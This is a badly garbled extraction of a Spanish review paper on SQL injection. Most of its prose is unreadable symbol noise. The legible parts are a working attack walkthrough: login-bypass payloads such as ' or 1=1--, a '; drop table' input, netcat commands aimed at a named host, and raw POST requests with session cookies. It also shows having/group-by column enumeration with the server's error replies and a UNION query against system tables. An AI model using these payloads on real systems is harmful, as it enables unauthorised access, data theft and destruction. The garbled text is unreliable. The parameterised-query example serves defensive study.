SQL Injection Techniques - A Review

!

! "
#$%& ( '
) " * +"
,-
# . / "0#$%
' " , *
) 1 % )" + ! " , *
, ") - **
2 #$% ' "- " "
3 #$% 4

) 5
, ! )
%" "
5 " 67" ) " " " . "
* 8* " ! 6 . "
. 5 9 ", # #$% 4
:) *
* + ;7 " /
#. ; , "
8< + " " = "
" " ) "
>; ) - " .>
5 ", "
4 ' " ; "
4 # ! " 8< # ! "
4 ! ', *
? #$% 4 : "- " " , "
@ ' "
' " "A "
B * "+% "' "
C ; "
A " "' ) "
5. "

"" #

8 " )4 * " &


" 7 " " " ( D

# ) + = * 6 " " " " "


) & " + 6 9 & 6 &"
. " + " " .
! & 9 " " " " 6 ( "" "
. " & . " " 4 "" " "& "=
7 "+ " ( " 7< " ) " . (( # +
2

; " " 6 " . " " .& 9 ") ) * 9


* " " 6 ) +" " ") "

5 . " & 7 " 6 (&


" " " . 4 #$%& " * " 9 " "
( " " " "

" $

!% & '
5 * " D C 2 . " " ) 4 ) " ) "
6 " . - ' & )4 6 " . 4
" * 9 " * " 9 ") " " "& 9
" 9 ( " ) 4 ( ) "
& " * ) " * . "
4 " "

% " + 4 " . 4
#8$ 8% ># 8 . " $ + % . . > * 6
* 6 7 " D C & #8$ 8% +
* & 6 " . "& #$% E# $ + % . . F

! " " * " " D " & 9 - ( "


) " " ,- 9 " . &
9 . 4 #$% " 6 + = " " "
E#+) " & : + " *
<F * 6 " "
51# CB@ + " #: * " CB

% . . = " 6" " #$%BC + #$%C & " " )


4 " " " "& + .= . " 6 " " 6 " "
"

+& " D " " >! #$%> " 9 4 "


9 " " . 4 ) ) " 6 "
& ( 4 " " . " 4 " "= 9
. & 6 " " #$%2
" ) " " . 4 " . 6 "& 9 " +
9 " " " " 6 6 " 6 . 4
"

( ) * # +,
$ ( " " " " " ) " " " 9 - + " *&
) 4 ) 4 " " 9 " = " " = ,:# ! 9
"& 9 " * " & " ) ) 4 9 " 6 "
2 G " E, . * & " 6 " " " "
"" F& " * ) " D= " " ) " ) :# & " " " )
" ) " . " 6 " !' " "
%51
3

5 ) & "C & 9 " " " . ) " " "


( ) " & ) 9 . ) ) "
" 6" 9 7 9 " )
4 & " 9 " ) * " " -
" . = " 6 6 " # & E! 9 "
) " 6 " 2F " 9 " * ) 4 = " *
9 " ) :# 2

% " 9 " 7" " " & +


) " " ") " &" * * 9 - " . =
" :# "9 " *& ) = )
9 " ) " :# 2 G " 1;

8 " " & " * ( ) 9 " 6


"" 6 & 9 = " . "9 6
6 " .
' " & 6 " 9 " )= " #+) "
" - " , " 9 . :# +
" * G " 1;

, " * D CC = 6 " ) #0#$%& ) 4


) > " * #$% # 6 3 * G " 1;> H " & "
( = ( " " D CC2

, " " & 67" " " * #$%& " * "


6 "6 " " " . E#$% F& 9 ( " . " "
" " " &" + CC? "
#$% @ " & " 9 " " "9 6 "
#+) " G " 1;& + . #$%
CCB " * 0 " ) " .
. 6 " " "

5 ) . " & " * #$% " 6 " &


9 " " " " I) & "
9 " ) " * " ) .
" - " , " ( #$% # 6 & "6 ) "
9 " . " " & "
. " " "& " " " " 6 4 ""
" . " & 9 " " "
" " "& ) = " 4 6
" . . " " =" "

"- .# / ! 0

' 9 * & " " *&


* " 9 6 9 " " " * " +
9 "" "& " " " ) "
6 "& + " " #$% # 6 " < " .
?

# ) ") + " " #$% ) " &


4 & * " " ) " " ) " " . 9
)6 ) = " ) 4 . & "9
. " " & "9 & "
& " + ) " ) 4 " E' "
" J " " " " #0#$% # 6 & 9 "
6" " F

8 " " & " . " ") " " 9 "


6 ) " " " " " " " #0#$% 9
" . & 6 6 " 9 "
. " )4 6 & " 7 " #$% 4

%# )
; . "& ". " *
" " "" + " 6 "& 9 4
" " #0#$%& " "* " * & 4
" " "& 9 ) " . 6 "

8 " #0#$% " . " "


>#5> + . " = " & "" * "
" > > E- KKF

8 " 9 . " = & 9 6


" #5 " (. " "6 4 " EIF " #0#$% # 6 &
) " " ) " " "&" )7 "" 6
" < " 6 . "& " 4 & " "
< "

( 1 ( * $# + )
#0#$% " < " " "& ) = " 1 % )"
6 L"& " 4 " "
. " " < " " ) 4 "

5 " "6 " E#51& 5 ; M& !N #!N& ;'!& F + = "


" " ( 9 " 9 " " *
" " & " " " ;'! ! + 1 !

5 " + " 9 "


E8" F ( ) " " & " 6 #0#$%
# 6 & " " ;'! 332

5 ) " ) " I . " 9 .


" ) " + ) 4 "
6 "9 " " "

+* " " " " )9


" " ) " " " . & 9 " #0#$%
" & *
@

8 * 6 " ) " " = " " D "


6 #$% E! 4 #5 "" > >F " " " "
7 " + #$% "9 6 " . "
& " 9 )7 "& " "
6 "& . ;:,:# " " " ) "
"6 )

+ ( & ,#))
; , 6 % * " >; ! * . " *
#$% # 6 > O#$% # 6 "* " " " , ") "
- ** " " " > 8" ". * 9 1: < " 6 "& "
9 " " * * " + " "
6

P & " " " " 6= " 9 " "


" ,! " #$% # 6 " & "
) . " " " " " "
< "& 9 +" ") < & " " "
" "6 ) "

# ) " " ""


* " ") " ) ** #$%&
9 " " ) > M . 8< " G " >&
" ) " ") ) ** " ) " "
" "" >" 6Q * EF>

5 " < = " > M . 8< " G "


> E #-1 B303B 022CB0@F " " 9 (
< )

< Q M9 < Q " "


< Q " " < Q" 6
< Q < < Q " + "
< Q" "9 " + < Q 6)
< Q"9 .

! -"""

" Q " Q " +


" Q " Q " +
" Q . +
"2 % & ,

; " ) & #$% " . 4 " " 5 "


" * " <" " " " " E!%0#$%
" : & ; " 0#$% " " *F "
6 "& < " . " " " "& . " "
" " & " * * " 6 (
" " " . "

% & +% + % ! .# . &
/ 51; ( . " "
8H:R8 ( 6 " "
,81S ( . "

% & ++ + + ) .# . &
' 85;8 ( 6 " ) "& " = "
, :! 8 ) " = "
( * " ) " . . "
5%;8
) * " "

% & + + #! .# . &
( " ." " ) " "9
#8%8';
" "* .
( . " " ) " "
1#8 ;
J
( * "6 " " "+
!,5;8
." " " * "
( ." " ) ) "
,8%8;8
"

%! # #!
% " " "" " * ( " * " "9
" "

%! # #!
( " * ) " 6
A :
" " ." "
( " * " "9 )
G 8 8
" ." "9 " 6 "
( " " ." "" "
/ : ! -S
. " " =* "
( < " 9 ) " "*
5H 1/
.
( " ." "" "
: ,8 -S
" *
B

3 % &
T 9
U + 9
TU ,"
TV . 9
UV + . 9
V . 9
-8;G881 ( " * 6 6 "
% R8 (
1 ( " * ." " ) " "

4 & !

SELECT * FROM Tabla;


E8" " 6 6 " " " ." " ) >; ) >F

UPDATE Tabla SET password = 'Juajuajua' WHERE user = 'admin'
E8" " ( = "" " &
6 F

5 ) & " . 4 #$%& " * 9


4 " " "& " 9 " "* "
" " +

4 " #$% " & " "


" 4 " ! . * & = " "
* 4 " ) & " " ""
4 " " & 4

# ) " & " 6 " & " +


" " 9 6 " . "
& " " " 6 " 9 9
7 + #$% " ")

"5

#
# 67 " 9 . ( . * " 9 "& " .
" = " . " " >5 9 "
H ) " ' 8 >& " 9 * 6 & " "9
") & & " " " #$% ) "&
C

" 6 " ) & )4 6 *


" " " = "

# ) " < 6 "" ) " "& "


6 " ) " . * & "
9 " " * " " 6" 6
9 " . "6 " " " <
+ . " ") " " " " 6 )

5 " * " 4 . 4 J . " &


! " # " & " * "
" 9 . " " " 7 " " " 8
" &+ )4 6 . .J
" " " & "
" ! " # &) 4 "". " "

0 8* " ! 6 . "
05 9 ", # #$% 4
0 :) *
0 8< + " " = "
0' " ; "

, " * & " 4 * 9 * + 9 .


) 4 " . " )4 6 " "
* " 6 "

( 6!
# ) 7 >#$% 4 > " ) J
) " " " * #0#$%& "9 . "
9 " & " & 9
" " 9 )
. < 7<

8" ". * 9 " " ) " " " " " " 6
( " . " "* "9 6 " " < " * "& "
9 &. " ". *
8" " 6 " " " =*
" "9 + "" "G " * # 6 "
4 " ) " " 5#! ) " " " #0
#$%& " " " G " 9 *
" 6 " )

+ 4! $ (! &
5 9 " =" " 9 " "
" 6 ) &* " ( " " "
+ .= " " " < 7< "
8 9 + = " " " ) ) " )9
( 6 & "9 ) 4 " "
" 9 "9 " " " "

8" " ) 9 + = " " "& " 6 "


6 ) " "& ) "
" 6" & " " 6 "
6 ) " " "" 6 " " 6 )& " 9
)7 " * " "" ) " "

; " " " * " )& " " : % &


" " " &" " " " 6 "& + " ) * "
* " " 6 ) . " " ) "
+ " D

:M& " ) 6 " * + =


" " " " 9 " " . ) "
" ) M. & " . < " "
"+ " " * " "

8 "& ) . ( ) " "


" ) .J " " " *
& 6 ( = " = " 6" . " ) " .
"

<FORM action=logon/logon.asp method=post>
<input type=hidden username=_UserName password=_Password>
</FORM>

8" * . . &) " " " " . " " . 5#!


9 " " 6 " & ) " " E!
+ J " " ( ) * ; %& 9
. 5#! " < ) " "& .
" " " . " " * ; % + 6 6
" " F 8 * 6 + ) ) & * &
" . " " + 6 . "=

select * from users where username = _UserName and password = _Password

5 ) "9 " " " & ( " " " . &


* " 6 " " " . "II ) " " "= + &" .
" " 6 6 4 & " " &
+ ) ) " " ) "
< " % " * " "

http://www.objetivo.com/libreria.asp?edicion='Noviembre'

! " " & " % = ) " " "


" " 9 + " . "
" ) + ) " " " .= EN,F )7 " "
L1 6 ) L " " " 6 . 5#! 9
" 8 " " & + ) )
) 4 . . ) " " "
"* " " " . 9 * 6 " 6 . "

select * from numeros_anteriores where edicion = 'Noviembre'

" & " 9 ) " " "* " " ) "


#$% > 6 >& = " " 9 " . * 7 "
" . & + . " + " + 9 ) "
" " " " & " " " 9 +
#$%

5 6 " " " * " " 4 " ""


& " " ) " " + " ! & " " L
E' # F ( " " ")
" " ( ) 4 " ) +
.

% L E' # F " " * #$% # 6 *


"& "9 " 6 9
" 4 " * " 9 6
&" 9 " "" " )
9 + #$%

H " 4 9 = " " " " " .


) ( * . " + )
" " " & "

Usuario : An'gel
Password : 338xD

select * from users where username = 'An'gel' and password = '338xD'
select * from numeros_anteriores where edicion = 'N'oviembre'

8 ) " " " 9 " 9 " "" "" " "


#$% # 6 & " 9 " & " 9
" . " . ( " " +
" . "

username = 'An'
edicion = 'N'

% . & ". 9 " . " * "


"& #$%& * " ( & 4 "
" " & " 9 9 9 "
" " " + & ". * #$% # 6

5 ) 9 " = " " . + * . "9


"" " L5 L + L1L II

8 " & . " "6" 9 9 " .J 6


6 67" ) " "+ " " * "
" 4 " * " %& " " " ) "&
" " ( 6 & ( .
"

8" " * 6 & " 6 9 " " " " "


" " " )4 6 + ) 4 " " " " )"
") " " . " . & " " " " "
" " 6 "& " * " 9 " .
) " "

8 * 6 & 9 " " " . " " &


" " 6 6 . & ) ) . " .J . 7<
+ . )

A ) = " )7 & " "" 6 " "


& 9 " "
E84 " " ? >8 # 6 >F "6 "
" )7 " ". & 9 + #$% " 6 ) " " 9 "&
9 " < 9 ) " " ) 4 + " (
7 " " " " ' " ' & " ) 4 > . #$%
# 6 " . #$% 4 > EH B * " + " "F
( ( 9 " " * .
6 ) " 9 ". " <
2

1 $ %
&

' (#)*
+! , -. , / %
0 ,

, 123

% &
- & ) " 6 9 * & " " " &
" ) " " " ) ) "
* "" " ) " " + "& . "
" I " + = " " "& + "9 " .
& " ( .J ) " E! * >. . >F
) " "9 " ." > . " > )
" "" . "" >% " ' ">
)4 6 6

6 !8 ( 7 .
"6
" 7 " #$% 4 " & " * " 9
. " 9 " " "& 9 . " "
; %& 5#!& & " " " 6 ( 9 " < #$%
# 6 ' " 9 " ) "& "& .J "
6 ) & " & 4 & . " + ) 4 *
& 6 " "* " EH > % " ' ">F

# )
& " > 6 " > + = " " " = "
* "6 & " " . 9 " ) ) + = " " " " "
9 & 4 & " " . " . " " "
) "=

8 " " & . " "6 ) "


" 6 " # ) . " " " " ) "
* & 1: ) ) "& " " " " * " *
" " & "6 " 6 "
" " ) E8" " ) "& ) 6= " "&
" ) 6 "+ . F

9 ;:,5 * & 6 " "> "> " +J


9 " " " 6 ( " . 9 " )

! " " 6 " & . " =


&" ( . " 7 " " " 9 . * ) "
. " " 7 & "= )7 * 9 "
=
3

$ (! 6) $ (! ) & 3(
! . " " & #
86 " : 0% & "
, " "+
" " "
* " .= & ! . "
" " .= "& : 0%
" " " D " 9
" 6" + ) " < "
"+* " " " "
- & 9 4 4 4
) " . "
"" " . *= 4 " " " " " "" "
" " " ) "& 9
" " "& " . "
" 6"
* .
5 " "
" " & )
) *
/ = "+ "
"& ) . " "
+ * "& " " ) 6 " "
"

! " " " . " . I) & "6"


" * " "& " E> L >F * +
" 6" * " ) 6 "

H 7 " " + .J " "


" " . " #$% = " " " * 9 "
" " . "" .

! " 9 " " " + = " "


* " ; % 5#!& ) * * " "
= " " 9 6 "9 " " " 6 "& . "
# 5 : + !5##G: , " " .
. 5#! 9 ) " + 6 #$% ; ) 7 = "
" 9 * " " 6 #$% " <""
. " " " 4 "

! 6 " 4 8" " * . < = " )


6 ) & . *=

---- Excerpt -------------------------------------------
<FORM action=ingreso.asp method=post>
<TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0>
<TBODY>
<TR bgColor=#ff0066>
<TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD> </TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Excerpt -------------------------------------------

! " 9 * ( = & ; % " "& + "


4 . 5#! E! " " & . " " F
5 ) &" "9 ) 4 ( . " " & "
9 6 " " " " " "&
" " " 9 * #$% " 6 " " ) "
) . 9 + "6" "

select * from users where username = 'Angel' and password = '338xD'

! " " 9 " " + "" 9 . ) <"


) " "9 ( " * 9 = 6
( 6

) " " ) * " "


) #$% 4 " I :M& 6 "
" * = " " + . "
" " + " " D . " 'or 1=1--

Usuario : 'or 1=1--


! "" L V W

A 47 " "& 9 = " . ) +


.

select * from users where username = ' or 1=1-- and password = ' or 1=1--
@

1 9 " 9 " <" " " >: > 9 " &


"" " 6 6 " 6 E "6 " ) F&
. + = " " " " "" " . " "

1 ( ,
0 4

Usuario : 'OR''='
Password : 'OR''='

5
4/

' ) & " " 6 + 6 4 .


" > " ">& " " " > 00 > E, ) / F "
#$% ( & " "
"& #$% 9 . 9 6 .
. +

# ) " " 7 " . " 6 " 9 . "


< + " & " & " 6"
& " ) "& " . "
" & ( " 6 .

#. 4 & " " " " " " 9 <"


"" )4 6 & .J " * >5 > > > " =
+ . "

Usuario : Admin'--
Password : 'or 1=1--

8 = & " 9 " " = " " " .

select * from users where username = 'Admin'-- and password = ' or 1=1--
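The three login queries above, replayed against a small SQLite database so the bypass and its fix can be seen side by side. This is an added example, not code from the paper: the `users` table and its two accounts are constructed, SQLite stands in for the SQL Server/ASP stack of the original, and `login_vulnerable` builds the statement by string concatenation exactly as the page's pseudo-code does, while `login_safe` binds the same two values as parameters.

```python
import sqlite3

# Constructed stand-in for the page's "users" table (not the paper's own schema).
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('Admin', 's3cret'), ('Angel', '338xD');
"""


def make_db():
    """In-memory SQLite database seeded with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement the way the page's pseudo-code does:
    select * from users where username = _UserName and password = _Password
    with both values pasted in as quoted literals. Returns True when any
    row matches, i.e. when the application would consider the login valid."""
    sql = ("select * from users where username = '" + username
           + "' and password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Same lookup with bound parameters. The statement text is fixed before
    the values are supplied, so a quote, 'or 1=1' or '--' inside the input is
    compared as data and can never change the query's structure."""
    sql = "select * from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def vulnerable_error(conn, username, password):
    """Returns the database error text the concatenated query raises, or None.
    A stray quote (the page's An'gel example) leaves the statement malformed,
    which is the SQLite counterpart of the ODBC 'Unclosed quotation mark'
    error quoted on the page; that text is what confirms an injection point
    to whoever submitted the quote, so it must never reach the client."""
    try:
        login_vulnerable(conn, username, password)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("Angel", "338xD"), ("' or 1=1--", "' or 1=1--"), ("Admin'--", "wrong")]:
        print(repr(user), "concatenated:", login_vulnerable(db, user, pw),
              "parameterised:", login_safe(db, user, pw))
    print("An'gel ->", vulnerable_error(db, "An'gel", "338xD"))
```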

# " * "= + " . 4 & ) ) + "


.

8 " & "6" ) 6 " " ">L>


E' " F " " + > 00 > E, ) / F
6 9 " + " < "& " ) "
" " > " . "> 6 " ) "& 9 "
" " ".

) 4) # $ 7! . ! #
5 " " " " "* " <
#$% + . & " 6 " ) 9 6
6 . " " ) " * " " " " .9
" "

' + = " 9 " " & . + & = "


* & ) 4 " > < > 9 " " . + *.
" + " " "" " "
! " 9 . E' + < " F& " " "
"& " " " " " . & . 9
9 " J " " ) " " "& + " 9 "
6 " " " & 4 & " 6
* " " " " " 6 " " "
" ) 4 & " 6 " 4 & " + *
" " " ) " < 6 . &
. " 9 " " " . "
"" 6

5 " * " " ) " * " " "& "


6 6 . " " ( " " "
9 D ) "9 " + *
" " * "

17 ! $ 7! . % #
' ; #$% # 6 & + " 6
"" 6 & " 6 . " " 6
##$%#8 H8 & " >
" < >< Q "
) & " ) +> > " " "
" ) " " #$% # 6

) " ) " ) " " *


) ) "& 6 " )4 "& +
)Q
. ) " " *

) " " )4 " ) " "


" . " 8 4
" " " " ". * .J
" 1 8 " " "& "
". * " " " " ) "+
6" "
B

. 6 9# + &
% " 9 " , . # 6 & . &" " " D " &
" 6" " " " " E' = " 5 F
" " E8 " " * 9 " 9 " .
) " = "& 4 " " 6
" ( + ( & F

5 * " " " " "9 "6" " &


9 6 " & " .J ) . 6 9 J *
9 " & . 4 & " " " " 9
= . " " 6

8 6 " " & M " " *


" &6 ) + #$%& = 4 & &
9 4 " " "

Usuario : '; drop table usuarios--
Password :

# * &" " 6 . "


* EH " >8* " ! 6 . " >F &
) ) ) > " "> " & 9 "
& .J " * " * "

' & + " " " & 6 "


6 ) ( " " & 6 5"= + &
" 9 , # " " " "9 " .
7 " " ) "& 9 ) " ( & ) = "
+

1 $ % %

+ 67 & 4/
) . $

: 3( ) & ! #&
! ) ) " * " " " " (
7 " #$% 4 & " " ") " 9 )
" " :,-' :%8 ,- 4 " #$% # 6 .
( D "

# ) " " 9 & " .


" & " " . 7< &
" " "E "9 ) " " ( = &
. ) "6 "& . " ) " 9
& + " " ) " " " * F
C

"9 " " "6 ) " + *

1 8 .1)

8 & "9 6 (" 6 " & 6 "


" " 6") " " "9 "
6 ) " "& . "

+* &" " * 9 " <


" " 4 " " &+ " " " 6 " "
" " + " 6 ( "

! " " ". 4 & " " " )


" > L > E' # F "
" D * " " .

Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '\')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61
Database error: Invalid SQL: Select * from usuario where (usuario.login='\'')
ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).)
Session halted.

- & 6 "9 * " < " :,-'

:)6 "" * #$%"


% < ) " " " . "
E > )Q ) >F
2 ! " * )Q ) & " 9 "
3 8 ) ) " " ( "> " >
? " " " "> . >

- & " 9 6 + " 6" . * 9 +


. " " :,-' 8 )Q )

1 3
%
)
010.8#* - "3.9$

(")-#) :;<<

123
----- Fragment -----------------------------------------
<?php
/*
* Session Management for PHP3
*
* Copyright (c) 1998-2000 XXXXXXXXXXXXXXX
([email protected])
* Modified by XXXXXXXXXXXXXXXXXXXX
([email protected])
*
* $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $
*/
class DB_Sql {
var $Host = "";
var $Database = "";
var $User = "";
var $Password = "";
var $UseODBCCursor = 0;
var $Link_ID = 0;
var $Query_ID = 0;
var $Record = array();
var $Row = 0;
var $Errno = 0;
var $Error = "";
----- Fragment -----------------------------------------

- " " " " >" " > 6 " "


6 " " 6 ) " X " + X! "" " "
. &" 9 " ( " " " . " "6 " " " "
* & . " 6 4 * . 9 "
* & " "& 9 * 9 9 6 " #$%&
A " + 6 & " " . " 6 "
" " . " " < 9 " 6 "
* " " " ) E8 " " = ) "
)Q ) F

: ) & * / !
:M& 6 " " 9 + #$% + "
* 6 " ) " " ) "
"& * .
+ " " " ) 9 4 * "
+ . & " 9 4 " " ) " 6 +
.
8 " " 6 " " " " ( &
" ( 7 " #$% 4 & "
"

! " 9 "6 " " " * & . "


6 4 6 " " & " " 9 "
" ) "& J " " ( 9 " "
" ) " " ) < 9 6 7 " ;;! " 6
"

# " +) " "' % E8 M


" " B * "+% "' "F&
9 " " " ) 4 E5 . 6 &
" . F ". . = "

- " 9 " 6 " " " " 6 " * "


7 " ;;! " )4 6 & " < " "& (
9 D " 6 " < & "" " 6
< & ". *

nc -vv www.objetivo.com 80 < sentencias.txt

' "
' + " * " " ;;! *
& ( " ** * E8 " " * # +1 & "
8 9 F& . . " ) )4 6 . "
) " + " D " * " E5 . ) " " " F& " 6
" "

8" * "

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 34
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=Angel&txtPassword=Angel
Y Y
Y H . " >! "" >
Y * . "
Y
H . " > " >
* . "

- & " . 9 "" * !:#; )


" " ** 6 < 9 4 <& " "
) " " " .

! " 9 " " . + " ) 9 " "


" " ) " + ) > L > E' " F
* & 6 6 " & )
( " ) " * ) ( 6
* ! " " 6 " " " " " " #$% 9
" " E 6 .& . )+& F

8 )46 "" ( > > " " ' " "


" " > "> #$%& " * " 6 " * " 9
6 9 #$% E 4 6 < & " 4
:%8 ,-F ) " " " " )" 6 "& " 4 " * 6 "
" 6 " "

H 6 " " " 4 < 6 " " " * "


( " 7 !:#; 9 " ( " 6= (
" ) 4 6

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 46
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=%27having+1%3D1--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
2

1 .
$ " =
3 )*1(
5*'>

! ) 6" "". " " " 6 !:#;& " 9 "


" " ) " > "> " "" " ;;!
% ) " " ( * " "
9 6 " 6 "

! + 4
\ ' # Z
] ! +' Z2-
, "! " Z25
OO 8" [ Z
V #. . Z2,
& ' Z '
E ! 7 "" Z B
F ! 7 "" Z C
U + Z28
T Z2'
5 )
!
[ " Z -
0 " 0
^ - M# " Z?'
Q " Q

:MK 9 " ( " 4 <& " " " " (


" 6= & +6 9 " ! " 6 "
6 = 9 " 6= " "
" 9 " 6" 9 " &+ 6 "9 "
" " " " )

8 "

nc -vv www.objetivo.com 80 < Injection.txt > result.html

- 6 "9 " 9 . " " + > 6 .>&


) " 6" * " 9 4 " "

! " " " & . " & " 7


* " 9 " " * " )
" "" " + "

H " 9 4 " "


3

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/Login.asp, line 85

! * KK " " " & " )" 6 9


" 4 " & 6 :,-' #$% # 6 " 6 6 )
) ) " " ( * " " . .
E # 5 :#F& "= )7 " E " ,F

5 9 " ) ) & " * " = &


" 6 6 " " * 4 < + ( " " * "
" "& " " " ) # 5 :#
H " 9 = " * " 6 !:#;

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 71
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=%27group+by+usuarios.UserID+having+1%3D1--&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. "
H + L. )+ " " " , 6 . V 00

% . 4 6 " = &6 " ".


"

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/Login.asp, line 85

6 ( " " " &


" 9 " " > 6 .>
" 6 ( " >. )+> " )
+ " , ) # 5 :#& " " ,

#. " .= & " " " " "+


" " 9 ) # 5 :# ( "
> . " > * " " "& "
> 6 > " ) " + 8" " =

'group by usuarios.UserID,usuarios.UID having 1=1--

#! ! *

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause.
/Login.asp, line 85

'group by usuarios.UserID,usuarios.UID,usuarios.Nombre having 1=1--

#! ! *

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause.
/Login.asp, line 85
@

'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,usuarios.Email having 1=1--

#! ! *

HTTP/1.1 100 Continue
Server: Microsoft-IIS/4.0
Date: Fri, 14 Feb 2003 20:02:22 GMT

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/4.0
Date: Fri, 14 Feb 2003 20:02:23 GMT
Connection: close
Location: PaginaPersonal.asp
Content-Length: 139
Content-Type: text/html
Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&USERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun, 16-Mar-2003 05:00:00 GMT;path=/
Cache-control: private

Object Moved
This object may be found here.

:M 9 =&
" )" 6 " + )
". > " "8 > 8 9
" " 9 & ) " . * ) " . "
> > " ( " #8%8'; . E/ "1
F A=4 " 9 " " !:#; ;;! 1: " &" 9
" " " 6 . " " " "
) " "& 4 6 9 #$% 6
+

E8" " L. )+ " " " ,& " " ,& " "1 ) & " "8
6 . V 00F

, " & " " 9 & * "


* " " " " ) &
( " " " . "

' & . " " " "" . " 9 ;:,:# " "
) " " #8%8'; . & " "&
9 + 9 " " " " #8%8'; " + 9 *
" " II 6 " 4 < " #
9 " * " " .

SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x AND campo5=y
( 7 E8" " >. )+> + > 6 .>F "
) = " " ) " > >& > > + > 2>&
" ) = " <" > ?> E, * " " 9 "
. * >#8%8'; _ A : ` a> " ="&" * )
"+ " " " 7 F " " " " " "
) ( . " "

POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 297
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina

txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+from+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3D%27usuarios%27+order+by+1+desc%29+order+by+1--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
Y
H + "L " ) & & & * "+" )4 " & "+" "
) V) VL " "L ) E" )
* "+" )4 " & "+" ") V) VL " "L
)+ " F )+ 00

- 9 " "
" III H "& ( " +
> "> = 9 ) "" " # * " (
" " . & " "
+ % . " 1 :1 " . + 9
" " " & " " " " ) " ""
